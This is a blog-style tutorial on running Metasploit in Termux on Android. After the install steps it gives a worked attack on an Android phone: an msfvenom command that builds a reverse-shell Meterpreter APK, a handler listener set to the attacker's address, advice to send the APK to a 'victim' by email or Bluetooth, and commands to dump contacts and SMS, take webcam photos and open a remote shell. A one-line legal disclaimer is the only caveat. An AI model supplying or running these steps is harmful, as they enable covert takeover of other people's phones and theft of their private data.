How to Use Metasploit in Termux: A Complete Guide
 |
| METASPLOIT |
Metasploit is one of the most powerful penetration testing frameworks used by cybersecurity professionals and ethical hackers. While it is traditionally used on Linux or Windows systems, you can also run Metasploit on Android using Termux. In this guide, we’ll walk you through the installation and usage of Metasploit in Termux with real-time examples.
Prerequisites
Before we begin, ensure you have:
A rooted Android device (recommended for full functionality).
Termux installed from F-Droid (avoid the Play Store version as it’s outdated).
A stable internet connection.
Basic knowledge of Linux commands.
Step 1: Update & Upgrade Termux
Open Termux and run the following commands to update packages:
pkg update && pkg upgrade -y
Step 2: Install Required Dependencies
Metasploit requires several dependencies to function properly. Install them using:
pkg install wget curl git ruby -y
Step 3: Install Metasploit in Termux
There are two methods to install Metasploit in Termux:
Method 1: Using the Official Script (Recommended)
Run the following commands:
wget https://raw.githubusercontent.com/gushmazuko/metasploit_in_termux/master/metasploit.sh chmod +x metasploit.sh ./metasploit.sh
This script will automatically install Metasploit and its dependencies.
Method 2: Manual Installation
If the script fails, you can manually install Metasploit:
git clone https://github.com/rapid7/metasploit-framework.git cd metasploit-framework gem install bundler bundle install
Step 4: Launch Metasploit
After installation, start Metasploit using:
./msfconsole
If you see the msf6 > prompt, Metasploit is running successfully.
Step 5: Basic Metasploit Commands
Here are some essential commands to get started:
help– Show all available commands.search [exploit]– Search for a specific exploit.use [exploit_path]– Load an exploit module.show options– Display configurable options for the selected exploit.set [option] [value]– Configure exploit settings.exploit– Launch the exploit.
Real-Time Example: Exploiting Android with Metasploit
Let’s simulate an attack on an Android device using Metasploit.
Step 1: Generate a Payload
We’ll create a malicious APK to gain a Meterpreter session:
msfvenom -p android/meterpreter/reverse_tcp LHOST=your_ip LPORT=4444 -o /sdcard/hack.apk
Replace
your_ipwith your local or public IP.The payload will be saved as
hack.apkin your device storage.
Step 2: Set Up a Listener
In Metasploit, run:
use exploit/multi/handler set payload android/meterpreter/reverse_tcp set LHOST your_ip set LPORT 4444 exploit
This will start a listener waiting for the victim to install and run the malicious APK.
Step 3: Send the Payload to the Target
Transfer the
hack.apkto the victim’s device (via email, Bluetooth, etc.).Once executed, you’ll get a Meterpreter session.
Step 4: Post-Exploitation Commands
Once connected, you can:
dump_contacts– Extract contacts.dump_sms– Read SMS messages.webcam_snap– Take a picture using the victim’s camera.shell– Open a remote shell.
Important Notes & Warnings
Legal Disclaimer: Use Metasploit only on systems you own or have permission to test. Unauthorized hacking is illegal.
Firewall Issues: If the payload doesn’t connect, check your firewall or use Ngrok for port forwarding.
Termux Limitations: Some exploits may not work due to Android’s security restrictions.
Conclusion
Metasploit in Termux allows you to perform penetration testing on the go. While it has some limitations, it’s a great way to practice ethical hacking. Always use this knowledge responsibly and legally.
Stay ethical, stay secure! 🚀
Liked this guide? Share it with fellow cybersecurity enthusiasts! 🔥
Need help? Drop a comment below! 👇
No comments:
Post a Comment